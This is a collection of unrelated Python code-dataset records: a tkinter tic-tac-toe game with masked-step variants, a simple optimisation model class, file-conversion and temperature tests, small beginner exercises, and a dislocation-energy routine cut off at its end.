self.botão0x0.configure(command=self.botão0x0_clicado)\n self.botão0x1 = tk.Button(self.window)\n self.botão0x1.grid(row=1, column=1, sticky='nsew')\n self.botão0x1.configure(command=self.botão0x1_clicado)\n self.botão0x2 = tk.Button(self.window)\n self.botão0x2.grid(row=1, column=2, sticky='nsew')\n self.botão0x2.configure(command=self.botão0x2_clicado)\n self.botão1x0 = tk.Button(self.window)\n self.botão1x0.grid(row=2, column=0, sticky='nsew')\n self.botão1x0.configure(command=self.botão1x0_clicado)\n self.botão1x1 = tk.Button(self.window)\n self.botão1x1.grid(row=2, column=1, sticky='nsew')\n self.botão1x1.configure(command=self.botão1x1_clicado)\n self.botão1x2 = tk.Button(self.window)\n self.botão1x2.grid(row=2, column=2, sticky='nsew')\n self.botão1x2.configure(command=self.botão1x2_clicado)\n self.botão2x0 = tk.Button(self.window)\n self.botão2x0.grid(row=3, column=0, sticky='nsew')\n self.botão2x0.configure(command=self.botão2x0_clicado)\n self.botão2x1 = tk.Button(self.window)\n self.botão2x1.grid(row=3, column=1, sticky='nsew')\n self.botão2x1.configure(command=self.botão2x1_clicado)\n self.botão2x2 = tk.Button(self.window)\n self.botão2x2.grid(row=3, column=2, sticky='nsew')\n self.botão2x2.configure(command=self.botão2x2_clicado)\n self.label_turno = tk.Label(self.window)\n self.label_turno.grid(row=4, column=0, columnspan=1, sticky='nsew')\n self.label_turno.configure(text='Turno de : {0}'.format(self.jogo.\n player), bg='Black', fg='Green', font='Arial 9')\n self.reiniciar = tk.Button(self.window)\n self.reiniciar.grid(row=4, column=1, columnspan=1, sticky='nsew')\n self.reiniciar.configure(text='Reiniciar', font='Arial 24',\n activeforeground='Green', fg='Red', command=self.restart)\n self.label_ganhador = tk.Label(self.window)\n self.label_ganhador.grid(row=4, column=2, columnspan=1, sticky='nsew')\n self.label_ganhador.configure(text='Ganhador: {0}'.format(self.jogo\n .ganhador), bg='Black', fg='Green', font='Arial 9')\n self.vitorias_X.configure(text='Vitórias de X: {0} '.format(self.\n jogo.vitórias_x), bg='Blue', fg='White')\n self.vitorias_O.configure(text='Vitórias de O: {0} '.format(self.\n jogo.vitórias_o), bg='Yellow', fg='Black')\n\n\njogodavelha = Tabuleiro()\njogodavelha.iniciar()\n",
"step-5": "import tkinter as tk\nimport classejogo\n\n\nclass Tabuleiro():\n def __init__(self):\n self.jogo = classejogo.Jogo()\n self.window = tk.Tk()\n self.window.title(\"Jogo da Velha\")\n self.window.geometry(\"300x360+100+100\")\n self.window.rowconfigure(0, minsize=30, weight=1)\n self.window.rowconfigure(1, minsize=100, weight=1)\n self.window.rowconfigure(2, minsize=100, weight=1)\n self.window.rowconfigure(3, minsize=100, weight=1)\n self.window.rowconfigure(4, minsize=30, weight=1)\n self.window.columnconfigure(0, minsize=100, weight=1)\n self.window.columnconfigure(1, minsize=100, weight=1)\n self.window.columnconfigure(2, minsize=100, weight=1)\n self.window.columnconfigure(3, minsize=100, weight=1)\n \n #Criando os Botões:\n self.vitorias_X = tk.Label(self.window)\n self.vitorias_X.grid(row=0, column=0, sticky=\"nsew\")\n self.vitorias_X.configure(text=\"Vitórias de X: {0} \".format(self.jogo.vitórias_x),font='Arial 10', bg='Blue', fg='White')\n \n self.placar = tk.Label(self.window)\n self.placar.grid(row=0, column=1, sticky=\"nsew\")\n self.placar.configure(text= \"<- PLACAR ->\",font='Arial 10', bg='Black', fg='Green')\n\n self.vitorias_O = tk.Label(self.window)\n self.vitorias_O.grid(row=0, column=2, sticky=\"nsew\")\n self.vitorias_O.configure(text=\"Vitórias de O: {0} \".format(self.jogo.vitórias_o), font='Arial 10', bg='Yellow', fg='Black')\n \n \n self.botão0x0 = tk.Button(self.window)\n self.botão0x0.grid(row=1, column=0, sticky=\"nsew\")\n self.botão0x0.configure(command=self.botão0x0_clicado)\n \n self.botão0x1 = tk.Button(self.window)\n self.botão0x1.grid(row=1, column=1, sticky=\"nsew\")\n self.botão0x1.configure(command=self.botão0x1_clicado)\n \n self.botão0x2 = tk.Button(self.window)\n self.botão0x2.grid(row=1, column=2, sticky=\"nsew\")\n self.botão0x2.configure(command=self.botão0x2_clicado)\n \n self.botão1x0 = tk.Button(self.window)\n self.botão1x0.grid(row=2, column=0, sticky=\"nsew\")\n self.botão1x0.configure(command=self.botão1x0_clicado)\n \n self.botão1x1 = tk.Button(self.window)\n self.botão1x1.grid(row=2, column=1, sticky=\"nsew\")\n self.botão1x1.configure(command=self.botão1x1_clicado)\n \n self.botão1x2 = tk.Button(self.window)\n self.botão1x2.grid(row=2, column=2, sticky=\"nsew\")\n self.botão1x2.configure(command=self.botão1x2_clicado)\n \n self.botão2x0 = tk.Button(self.window)\n self.botão2x0.grid(row=3, column=0, sticky=\"nsew\")\n self.botão2x0.configure(command=self.botão2x0_clicado)\n \n self.botão2x1 = tk.Button(self.window)\n self.botão2x1.grid(row=3, column=1, sticky=\"nsew\")\n self.botão2x1.configure(command=self.botão2x1_clicado)\n \n self.botão2x2 = tk.Button(self.window)\n self.botão2x2.grid(row=3, column=2, sticky=\"nsew\")\n self.botão2x2.configure(command=self.botão2x2_clicado)\n \n #Criando a Label dos turnos: \n self.label_turno = tk.Label(self.window)\n self.label_turno.grid(row=4, column=0, columnspan=1, sticky=\"nsew\")\n self.label_turno.configure(text=\"Turno de : {0}\" .format(self.jogo.player), bg='Black', fg='Green',font='Arial 9',)\n \n #Criando Botão de Reiniciar:\n self.reiniciar = tk.Button(self.window)\n self.reiniciar.grid(row=4, column=1,columnspan=1, sticky=\"nsew\")\n self.reiniciar.configure(text=\"Reiniciar\", font='Arial 18', activeforeground='Green', fg='Red', command=self.restart)\n \n self.label_ganhador = tk.Label(self.window)\n self.label_ganhador.grid(row=4, column=2, columnspan=1, sticky=\"nsew\")\n self.label_ganhador.configure(text=\"Ganhador: {0}\" .format(self.jogo.ganhador), bg='Black', 
fg='Green',font='Arial 9',)\n############################################################################### \n def clicou(self, i, j):\n print(\"Turno de: {0} \" .format(self.jogo.player))\n print(\"Botão {0} x {1} clicado\" .format(i,j))\n###############################################################################\n def botão0x0_clicado(self):\n self.clicou(0,0)\n self.botão0x0.configure(text=self.jogo.player, state= \"disabled\", font='Arial 100 ')\n self.jogo.recebe_jogada(0,0)\n self.label_turno.configure(text=\"Turno de: {0}\" .format(self.jogo.player))\n self.label_ganhador.configure(text=\"Ganhador: {0}\" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)\n def botão0x1_clicado(self):\n self.clicou(0,1)\n self.botão0x1.configure(text=self.jogo.player, state= \"disabled\", font='Arial 100 ')\n self.jogo.recebe_jogada(0,1)\n self.label_turno.configure(text=\"Turno de: {0}\" .format(self.jogo.player)) \n self.label_ganhador.configure(text=\"Ganhador: {0}\" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)\n def botão0x2_clicado(self):\n self.clicou(0,2)\n self.botão0x2.configure(text=self.jogo.player, state= \"disabled\", font='Arial 100 ')\n self.jogo.recebe_jogada(0,2)\n self.label_turno.configure(text=\"Turno de: {0}\" .format(self.jogo.player)) \n self.label_ganhador.configure(text=\"Ganhador: {0}\" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',) \n def botão1x0_clicado(self):\n self.clicou(1,0)\n self.botão1x0.configure(text=self.jogo.player, state= \"disabled\", font='Arial 100 ')\n self.jogo.recebe_jogada(1,0)\n self.label_turno.configure(text=\"Turno de: {0}\" .format(self.jogo.player))\n self.label_ganhador.configure(text=\"Ganhador: {0}\" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)\n def botão1x1_clicado(self):\n self.clicou(1,1)\n self.botão1x1.configure(text=self.jogo.player, state= \"disabled\", font='Arial 100 ')\n self.jogo.recebe_jogada(1,1)\n self.label_turno.configure(text=\"Turno de: {0}\" .format(self.jogo.player))\n self.label_ganhador.configure(text=\"Ganhador: {0}\" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)\n def botão1x2_clicado(self):\n self.clicou(1,2)\n self.botão1x2.configure(text=self.jogo.player, state= \"disabled\", font='Arial 100 ')\n self.jogo.recebe_jogada(1,2)\n self.label_turno.configure(text=\"Turno de: {0}\" .format(self.jogo.player))\n self.label_ganhador.configure(text=\"Ganhador: {0}\" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',) \n def botão2x0_clicado(self):\n self.clicou(2,0)\n self.botão2x0.configure(text=self.jogo.player, state= \"disabled\", font='Arial 100 ')\n self.jogo.recebe_jogada(2,0)\n self.label_turno.configure(text=\"Turno de: {0}\" .format(self.jogo.player))\n self.label_ganhador.configure(text=\"Ganhador: {0}\" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)\n def botão2x1_clicado(self):\n self.clicou(2,1)\n self.botão2x1.configure(text=self.jogo.player, state= \"disabled\", font='Arial 100 ')\n self.jogo.recebe_jogada(2,1)\n self.label_turno.configure(text=\"Turno de: {0}\" .format(self.jogo.player))\n self.label_ganhador.configure(text=\"Ganhador: {0}\" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)\n def botão2x2_clicado(self):\n self.clicou(2,2)\n self.botão2x2.configure(text=self.jogo.player, state= \"disabled\", font='Arial 100 ')\n self.jogo.recebe_jogada(2,2)\n self.label_turno.configure(text=\"Turno de: {0}\" .format(self.jogo.player))\n 
self.label_ganhador.configure(text=\"Ganhador: {0}\" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)\n \n def iniciar(self):\n self.window.mainloop() \n############################################################################### \n def restart(self):\n self.jogo.limpa_jogadas()\n \n self.botão0x0 = tk.Button(self.window)\n self.botão0x0.grid(row=1, column=0, sticky=\"nsew\")\n self.botão0x0.configure(command=self.botão0x0_clicado)\n \n self.botão0x1 = tk.Button(self.window)\n self.botão0x1.grid(row=1, column=1, sticky=\"nsew\")\n self.botão0x1.configure(command=self.botão0x1_clicado)\n \n self.botão0x2 = tk.Button(self.window)\n self.botão0x2.grid(row=1, column=2, sticky=\"nsew\")\n self.botão0x2.configure(command=self.botão0x2_clicado)\n \n self.botão1x0 = tk.Button(self.window)\n self.botão1x0.grid(row=2, column=0, sticky=\"nsew\")\n self.botão1x0.configure(command=self.botão1x0_clicado)\n \n self.botão1x1 = tk.Button(self.window)\n self.botão1x1.grid(row=2, column=1, sticky=\"nsew\")\n self.botão1x1.configure(command=self.botão1x1_clicado)\n \n self.botão1x2 = tk.Button(self.window)\n self.botão1x2.grid(row=2, column=2, sticky=\"nsew\")\n self.botão1x2.configure(command=self.botão1x2_clicado)\n \n self.botão2x0 = tk.Button(self.window)\n self.botão2x0.grid(row=3, column=0, sticky=\"nsew\")\n self.botão2x0.configure(command=self.botão2x0_clicado)\n \n self.botão2x1 = tk.Button(self.window)\n self.botão2x1.grid(row=3, column=1, sticky=\"nsew\")\n self.botão2x1.configure(command=self.botão2x1_clicado)\n \n self.botão2x2 = tk.Button(self.window)\n self.botão2x2.grid(row=3, column=2, sticky=\"nsew\")\n self.botão2x2.configure(command=self.botão2x2_clicado)\n \n #Criando a Label dos turnos: \n self.label_turno = tk.Label(self.window)\n self.label_turno.grid(row=4, column=0, columnspan=1, sticky=\"nsew\")\n self.label_turno.configure(text=\"Turno de : {0}\" .format(self.jogo.player), bg='Black', fg='Green',font='Arial 9',)\n \n #Criando Botão de Reiniciar:\n self.reiniciar = tk.Button(self.window)\n self.reiniciar.grid(row=4, column=1,columnspan=1, sticky=\"nsew\")\n self.reiniciar.configure(text=\"Reiniciar\", font='Arial 24', activeforeground='Green', fg='Red', command=self.restart)\n \n self.label_ganhador = tk.Label(self.window)\n self.label_ganhador.grid(row=4, column=2, columnspan=1, sticky=\"nsew\")\n self.label_ganhador.configure(text=\"Ganhador: {0}\" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)\n self.vitorias_X.configure(text=\"Vitórias de X: {0} \".format(self.jogo.vitórias_x), bg='Blue', fg='White')\n self.vitorias_O.configure(text=\"Vitórias de O: {0} \".format(self.jogo.vitórias_o), bg='Yellow', fg='Black') \n###############################################################################\n \njogodavelha = Tabuleiro()\njogodavelha.iniciar()\n",
"step-ids": [
9,
12,
15,
16,
18
]
}
|
[
9,
12,
15,
16,
18
] |
# Copyright (c) 2018, Raul Astudillo
import numpy as np
from copy import deepcopy
class BasicModel(object):
"""
Class for handling a very simple model that only requires saving the evaluated points (along with their corresponding outputs) so far.
"""
analytical_gradient_prediction = True
def __init__(self, output_dim=None, X=None, Y=None):
self.output_dim = output_dim
self.X = X
self.Y = Y
self.name = 'basic model'
def updateModel(self, X, Y):
"""
Updates the model with new observations.
"""
self.X = X
self.Y = Y
def get_X(self):
return np.copy(self.X)
def get_Y(self):
return deepcopy(self.Y)
def get_XY(self):
X = np.copy(self.X)
Y = deepcopy(self.Y)
return X, Y
    def get_model_parameters(self):
        """
        The basic model keeps no fitted parameters, so there is nothing to return.
        """
        pass
    def get_model_parameters_names(self):
        """
        The basic model keeps no fitted parameters, so there are no names to return.
        """
        pass
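# Illustrative usage -- a minimal sketch with arbitrary example data (the
# values below are assumptions, not prescribed by the module).
if __name__ == '__main__':
    X = np.array([[0.0, 0.0], [1.0, 1.0]])
    Y = [np.array([[0.5], [1.5]])]
    model = BasicModel(output_dim=1, X=X, Y=Y)
    model.updateModel(np.vstack([X, [[2.0, 2.0]]]), Y)
    X_out, Y_out = model.get_XY()
    print(X_out.shape, len(Y_out))  # (3, 2) 1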
|
normal
|
{
"blob_id": "88071df9367804b1c6e2b1c80da178ab7658e7a4",
"index": 3861,
"step-1": "<mask token>\n\n\nclass BasicModel(object):\n <mask token>\n <mask token>\n <mask token>\n\n def updateModel(self, X, Y):\n \"\"\"\n Updates the model with new observations.\n \"\"\"\n self.X = X\n self.Y = Y\n\n def get_X(self):\n return np.copy(self.X)\n\n def get_Y(self):\n return deepcopy(self.Y)\n\n def get_XY(self):\n X = np.copy(self.X)\n Y = deepcopy(self.Y)\n return X, Y\n\n def get_model_parameters(self):\n \"\"\"\n \"\"\"\n pass\n\n def get_model_parameters_names(self):\n \"\"\"\n \"\"\"\n pass\n",
"step-2": "<mask token>\n\n\nclass BasicModel(object):\n <mask token>\n <mask token>\n\n def __init__(self, output_dim=None, X=None, Y=None):\n self.output_dim = output_dim\n self.X = X\n self.Y = Y\n self.name = 'basic model'\n\n def updateModel(self, X, Y):\n \"\"\"\n Updates the model with new observations.\n \"\"\"\n self.X = X\n self.Y = Y\n\n def get_X(self):\n return np.copy(self.X)\n\n def get_Y(self):\n return deepcopy(self.Y)\n\n def get_XY(self):\n X = np.copy(self.X)\n Y = deepcopy(self.Y)\n return X, Y\n\n def get_model_parameters(self):\n \"\"\"\n \"\"\"\n pass\n\n def get_model_parameters_names(self):\n \"\"\"\n \"\"\"\n pass\n",
"step-3": "<mask token>\n\n\nclass BasicModel(object):\n <mask token>\n analytical_gradient_prediction = True\n\n def __init__(self, output_dim=None, X=None, Y=None):\n self.output_dim = output_dim\n self.X = X\n self.Y = Y\n self.name = 'basic model'\n\n def updateModel(self, X, Y):\n \"\"\"\n Updates the model with new observations.\n \"\"\"\n self.X = X\n self.Y = Y\n\n def get_X(self):\n return np.copy(self.X)\n\n def get_Y(self):\n return deepcopy(self.Y)\n\n def get_XY(self):\n X = np.copy(self.X)\n Y = deepcopy(self.Y)\n return X, Y\n\n def get_model_parameters(self):\n \"\"\"\n \"\"\"\n pass\n\n def get_model_parameters_names(self):\n \"\"\"\n \"\"\"\n pass\n",
"step-4": "<mask token>\n\n\nclass BasicModel(object):\n \"\"\"\n Class for handling a very simple model that only requires saving the evaluated points (along with their corresponding outputs) so far.\n \"\"\"\n analytical_gradient_prediction = True\n\n def __init__(self, output_dim=None, X=None, Y=None):\n self.output_dim = output_dim\n self.X = X\n self.Y = Y\n self.name = 'basic model'\n\n def updateModel(self, X, Y):\n \"\"\"\n Updates the model with new observations.\n \"\"\"\n self.X = X\n self.Y = Y\n\n def get_X(self):\n return np.copy(self.X)\n\n def get_Y(self):\n return deepcopy(self.Y)\n\n def get_XY(self):\n X = np.copy(self.X)\n Y = deepcopy(self.Y)\n return X, Y\n\n def get_model_parameters(self):\n \"\"\"\n \"\"\"\n pass\n\n def get_model_parameters_names(self):\n \"\"\"\n \"\"\"\n pass\n",
"step-5": "# Copyright (c) 2018, Raul Astudillo\n\nimport numpy as np\nfrom copy import deepcopy\n\nclass BasicModel(object):\n \"\"\"\n Class for handling a very simple model that only requires saving the evaluated points (along with their corresponding outputs) so far.\n \"\"\"\n analytical_gradient_prediction = True\n\n def __init__(self, output_dim=None, X=None, Y=None):\n self.output_dim = output_dim\n self.X = X\n self.Y = Y\n self.name = 'basic model'\n\n def updateModel(self, X, Y):\n \"\"\"\n Updates the model with new observations.\n \"\"\"\n self.X = X\n self.Y = Y\n\n def get_X(self):\n return np.copy(self.X)\n\n def get_Y(self):\n return deepcopy(self.Y)\n\n def get_XY(self):\n X = np.copy(self.X)\n Y = deepcopy(self.Y)\n return X, Y\n \n def get_model_parameters(self):\n \"\"\"\n \"\"\"\n pass\n\n def get_model_parameters_names(self):\n \"\"\"\n \"\"\"\n pass\n",
"step-ids": [
7,
8,
9,
10,
12
]
}
|
[
7,
8,
9,
10,
12
] |
import os
from .common import cached_outputs, data_files, test_outputs
import nappy.nc_interface.na_to_nc
import nappy.nc_interface.nc_to_na
def test_convert_nc_2010_to_na_2310():
ffi_in, ffi_out = (2010, 2310)
infile = os.path.join(cached_outputs, f"{ffi_in}.nc")
outfile = os.path.join(test_outputs, f"{ffi_out}_from_nc_{ffi_in}.na")
# Reading: infile
x = nappy.nc_interface.nc_to_na.NCToNA(infile, requested_ffi=ffi_out)
# Writing: outfile
x.writeNAFiles(outfile, delimiter=",", float_format="%g")
|
normal
|
{
"blob_id": "0de657ee173b606ad61d614a6168c00fcd571a70",
"index": 74,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_convert_nc_2010_to_na_2310():\n ffi_in, ffi_out = 2010, 2310\n infile = os.path.join(cached_outputs, f'{ffi_in}.nc')\n outfile = os.path.join(test_outputs, f'{ffi_out}_from_nc_{ffi_in}.na')\n x = nappy.nc_interface.nc_to_na.NCToNA(infile, requested_ffi=ffi_out)\n x.writeNAFiles(outfile, delimiter=',', float_format='%g')\n",
"step-3": "import os\nfrom .common import cached_outputs, data_files, test_outputs\nimport nappy.nc_interface.na_to_nc\nimport nappy.nc_interface.nc_to_na\n\n\ndef test_convert_nc_2010_to_na_2310():\n ffi_in, ffi_out = 2010, 2310\n infile = os.path.join(cached_outputs, f'{ffi_in}.nc')\n outfile = os.path.join(test_outputs, f'{ffi_out}_from_nc_{ffi_in}.na')\n x = nappy.nc_interface.nc_to_na.NCToNA(infile, requested_ffi=ffi_out)\n x.writeNAFiles(outfile, delimiter=',', float_format='%g')\n",
"step-4": "import os\n\nfrom .common import cached_outputs, data_files, test_outputs\n\nimport nappy.nc_interface.na_to_nc\nimport nappy.nc_interface.nc_to_na\n\n\ndef test_convert_nc_2010_to_na_2310():\n ffi_in, ffi_out = (2010, 2310)\n\n infile = os.path.join(cached_outputs, f\"{ffi_in}.nc\")\n outfile = os.path.join(test_outputs, f\"{ffi_out}_from_nc_{ffi_in}.na\")\n\n # Reading: infile\n x = nappy.nc_interface.nc_to_na.NCToNA(infile, requested_ffi=ffi_out)\n\n # Writing: outfile\n x.writeNAFiles(outfile, delimiter=\",\", float_format=\"%g\")\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
def DFS(x):
    # In-order traversal: visit the left child (2x), then the node, then the right child (2x+1).
if x > 7:
return
else:
        DFS(x * 2)
        print(x)
        DFS(x * 2 + 1)
if __name__ == "__main__":
DFS(1)
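    # The call above prints 4 2 5 1 6 3 7 (one number per line): the in-order
    # traversal of the complete binary tree with nodes 1..7, where node x has
    # children 2x and 2x+1.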
|
normal
|
{
"blob_id": "1cc8695aa694359314b6d478fe6abed29fdc6c91",
"index": 3309,
"step-1": "<mask token>\n",
"step-2": "def DFS(x):\n if x > 7:\n return\n else:\n DFS(x * 2)\n print(x)\n DFS(x * 2 + 1)\n\n\n<mask token>\n",
"step-3": "def DFS(x):\n if x > 7:\n return\n else:\n DFS(x * 2)\n print(x)\n DFS(x * 2 + 1)\n\n\nif __name__ == '__main__':\n DFS(1)\n",
"step-4": "\ndef DFS(x):\n # 전위순회\n if x > 7:\n return\n else:\n \n DFS((x * 2))\n print(x)\n DFS((x*2)+1)\n\n \nif __name__ == \"__main__\":\n DFS(1)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from temp_conversion_script import convert_c_to_f
from temp_conversion_script import fever_detection
def test_convert_c_to_f():
answer = convert_c_to_f(20.0)
expected = 68.0
assert answer == expected
def test2():
answer = convert_c_to_f(-40.0)
expected = -40.0
assert answer == expected
def test_fever_detection():
temp_list = [93.0, 98.0, 100.0, 105.0, 101.0]
max_temp, is_fever = fever_detection(temp_list)
expected_max = 105.0
    expected_fever = True
    assert max_temp == expected_max
    assert is_fever == expected_fever
|
normal
|
{
"blob_id": "d75187ed435c3d3aeeb31be4a0a4ed1754f8d160",
"index": 4436,
"step-1": "<mask token>\n\n\ndef test2():\n answer = convert_c_to_f(-40.0)\n expected = -40.0\n assert answer == expected\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_convert_c_to_f():\n answer = convert_c_to_f(20.0)\n expected = 68.0\n assert answer == expected\n\n\ndef test2():\n answer = convert_c_to_f(-40.0)\n expected = -40.0\n assert answer == expected\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef test_convert_c_to_f():\n answer = convert_c_to_f(20.0)\n expected = 68.0\n assert answer == expected\n\n\ndef test2():\n answer = convert_c_to_f(-40.0)\n expected = -40.0\n assert answer == expected\n\n\ndef test_fever_detection():\n temp_list = [93.0, 98.0, 100.0, 105.0, 101.0]\n max_temp, is_fever = fever_detection(temp_list)\n expected_max = 105.0\n is_fever = True\n assert max_temp == expected_max\n",
"step-4": "from temp_conversion_script import convert_c_to_f\nfrom temp_conversion_script import fever_detection\n\n\ndef test_convert_c_to_f():\n answer = convert_c_to_f(20.0)\n expected = 68.0\n assert answer == expected\n\n\ndef test2():\n answer = convert_c_to_f(-40.0)\n expected = -40.0\n assert answer == expected\n\n\ndef test_fever_detection():\n temp_list = [93.0, 98.0, 100.0, 105.0, 101.0]\n max_temp, is_fever = fever_detection(temp_list)\n expected_max = 105.0\n is_fever = True\n assert max_temp == expected_max\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
# str
owog = "Delger"
# len()        - length
# lower()      - convert to lowercase
# upper()      - convert to uppercase
# capitalize() - capitalize the first letter
# replace()    - replace characters
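# A few illustrative calls for the methods listed above (expected results are
# shown in the trailing comments):
print(len(owog))               # 6
print(owog.lower())            # delger
print(owog.upper())            # DELGER
print(owog.capitalize())       # Delger
print(owog.replace("e", "a"))  # Dalgar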
print(owog.find("e"))
print(owog.count("e"))
print(owog[2:10])
a = 21
b = 21
if a > b:
    print("a is larger")
elif a == b:
    print("equal")
else:
    print("b is larger")
a, b = map(int, input().split())  # convert to int so range() below works
for i in range(a, b+1):
print(i)
|
normal
|
{
"blob_id": "c4ca4b5c77c3c912b44a4853be30298ec845c4fd",
"index": 243,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(owog.find('e'))\nprint(owog.count('e'))\nprint(owog[2:10])\n<mask token>\nif a > b:\n print('a too ih')\nelif a == b:\n print('tentsuu')\nelse:\n print('b too ih')\n<mask token>\nfor i in range(a, b + 1):\n print(i)\n",
"step-3": "owog = 'Delger'\nprint(owog.find('e'))\nprint(owog.count('e'))\nprint(owog[2:10])\na = 21\nb = 21\nif a > b:\n print('a too ih')\nelif a == b:\n print('tentsuu')\nelse:\n print('b too ih')\na, b = input().split()\nfor i in range(a, b + 1):\n print(i)\n",
"step-4": "#str\r\nowog=\"Delger\"\r\n# len()- urt\r\n# lower()- jijigruuleh\r\n# upper()- tomruulah\r\n# capitalize()- ehnii useg tomruulah\r\n# replace()- temdegt solih\r\nprint(owog.find(\"e\"))\r\nprint(owog.count(\"e\"))\r\nprint(owog[2:10])\r\n\r\na=21\r\nb=21\r\nif a>b:\r\n print(\"a too ih\")\r\nelif a==b:\r\n print(\"tentsuu\")\r\nelse:\r\n print(\"b too ih\")\r\n\r\na, b = input().split()\r\nfor i in range(a, b+1):\r\n print(i)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
'''
Various tools for cleaning out nulls and imputing missing values
'''
|
normal
|
{
"blob_id": "bd310ab0bc193410b8f93ad5516b0731d2eba54f",
"index": 6268,
"step-1": "<mask token>\n",
"step-2": "'''\nVarious tools for cleaning out nulls and imputing \n'''\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
from numpy import pi,sqrt,cross,dot,zeros,linalg
from defs import *
##from numba import njit, prange
##
##@njit(parallel=True)
def engparallelb2(MU,NU,b1,b2,x1,x2,y1,y2,eta,a):
#For use in enginteract below
#HL p.154 Eq.(6-45)
b1x=b1[0]
b1y=b1[1]
b1z=b1[2]
b2x=b2[0]
b2y=b2[1]
b2z=b2[2]
Rab=Rp(x2,y2,eta,a)-Rp(x2,y1,eta,a)-Rp(x1,y2,eta,a)+Rp(x1,y1,eta,a)
#[b1',b2',x1,x2,y1,y2,eta,a,Rab]
#b1
ap=sqrt(eta**2+a**2)
Iab=Ia(x2,y2,1,ap)-Ia(x2,y1,1,ap)-Ia(x1,y2,1,ap)+Ia(x1,y1,1,ap)
Jab=Ja(x2,y2,1,ap)-Ja(x2,y1,1,ap)-Ja(x1,y2,1,ap)+Ja(x1,y1,1,ap)
return MU/4/pi*(b1x*b2x+(b1z*b2z+b1y*b2y)/(1-NU))*Iab \
+ MU/4/pi*(b1x*b2x)*(a**2/2)*Jab \
- MU/4/pi/(1-NU)*b1z*b2z*eta*eta*Jab
def engnonplanarb2(MU,NU,b1,b2,xi1,xi2,e3,costheta,x1,x2,y1,y2,z,a):
#For use in enginteract below
#
# ^ y axis
# /
# -
# y /
# / theta
# ---------------|----------------> x axis
# x
#
# x>0, y>0 HL p152, Eq.(6-33)
ap=sqrt(z*z+a*a)
Iab = Ia(x2,y2,costheta,ap)-Ia(x2,y1,costheta,ap)-Ia(x1,y2,costheta,ap)+Ia(x1,y1,costheta,ap)
Jab = Ja(x2,y2,costheta,ap)-Ja(x2,y1,costheta,ap)-Ja(x1,y2,costheta,ap)+Ja(x1,y1,costheta,ap)
Tab = ( Tfa(b1,b2,xi1,xi2,e3,costheta,x2,y2,z,a)
- Tfa(b1,b2,xi1,xi2,e3,costheta,x2,y1,z,a)
- Tfa(b1,b2,xi1,xi2,e3,costheta,x1,y2,z,a)
+ Tfa(b1,b2,xi1,xi2,e3,costheta,x1,y1,z,a) )
return ( MU/4/pi*(-2*dot(cross(b1,b2),cross(xi1,xi2))
+ dot(b1,xi1)*dot(b2,xi2) )*(Iab+a**2/2*Jab)
+ MU/4/pi/(1-NU)*Tab )
#When Iab incorporates Jab
#W = ( MU/4/pi* (-2*dot(cross(b1,b2),cross(xi1,xi2)) + dot(b1,xi1)*dot(b2,xi2) )*(Iab)
# + MU/4/pi/(1-NU)* Tab )
def enginteract(MU,NU,b1,b2,r1,r2,r3,r4,a):
#Computes interaction energy between two straight dislocation segments
#r1-r2 (Burgers vector b1) and r3-r4 (Burgers vector b2)
#MU is shear modulus, NU is Poisson ratio, a is core spread radius
r21=r2-r1
r43=r4-r3
r31=r3-r1
#Make sure that the segments are represented by column vectors
#if r21.shape[0]==1:
#r21=r21.T
#if r43.shape[0]==1:
#r43=r43.T
#if r31.shape[0]==1:
#r31=r31.T
#Segment line sense unit vectors
e1=r21/norm(r21)
e2=r43/norm(r43)
#Catagorise line segments according to whether they are parallel or not
e3=cross(e1,e2)
subzero=1e-10
if norm(e3)<subzero:
e2a=schmidt(r31,e1)
e3=cross(e1,e2a)
e3=e3/norm(e3)
eta=(dot(r3-r1,e2a)+dot(r4-r1,e2a))/2
x1=0
x2=dot(r2-r1,e1)
y1=dot(r3-r1,e1)
y2=dot(r4-r1,e1)
#engparallelb2 doesn't rotate b, it needs to be done here
b1n=zeros([3,1])
b2n=zeros([3,1])
b1n[0],b2n[0]=dot(b1,e1),dot(b2,e1)
b1n[1],b2n[1]=dot(b1,e2a),dot(b2,e2a)
b1n[2],b2n[2]=dot(b1,e3),dot(b2,e3)
return engparallelb2(MU,NU,b1n,b2n,x1,x2,y1,y2,eta,a)
else:
costheta=dot(e1,e2)
e3=e3/norm(e3)
e2a=cross(e3,e1)
z=dot(r31,e3)
z=-z
A=zeros([2,2])
A[0,0],A[0,1]=dot(r21,e1),-dot(r43,e1)
A[1,0],A[1,1]=dot(r21,e2a),-dot(r43,e2a)
rhs=zeros([2,1])
rhs[0],rhs[1]=dot(r31,e1),dot(r31,e2a)
t=linalg.solve(A,rhs)
r0=(1-t[0])*r1+t[0]*r2
x1=dot(r1-r0,e1)
x2=dot(r2-r0,e1)
y1=dot(r3-r0,e2)
y2=dot(r4-r0,e2)
return engnonplanarb2(MU,NU,b1,b2,e1,e2,e3,costheta,x1,x2,y1,y2,z,a)
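# Illustrative usage -- a minimal sketch assuming the helper routines pulled in
# from `defs` (norm, schmidt, Rp, Ia, Ja, Tfa) are available; the material
# constants and segment coordinates below are arbitrary example values.
if __name__ == '__main__':
    from numpy import array
    MU, NU, a = 1.0, 0.3, 0.1            # shear modulus, Poisson ratio, core radius
    b = array([1.0, 0.0, 0.0])           # Burgers vector shared by both segments
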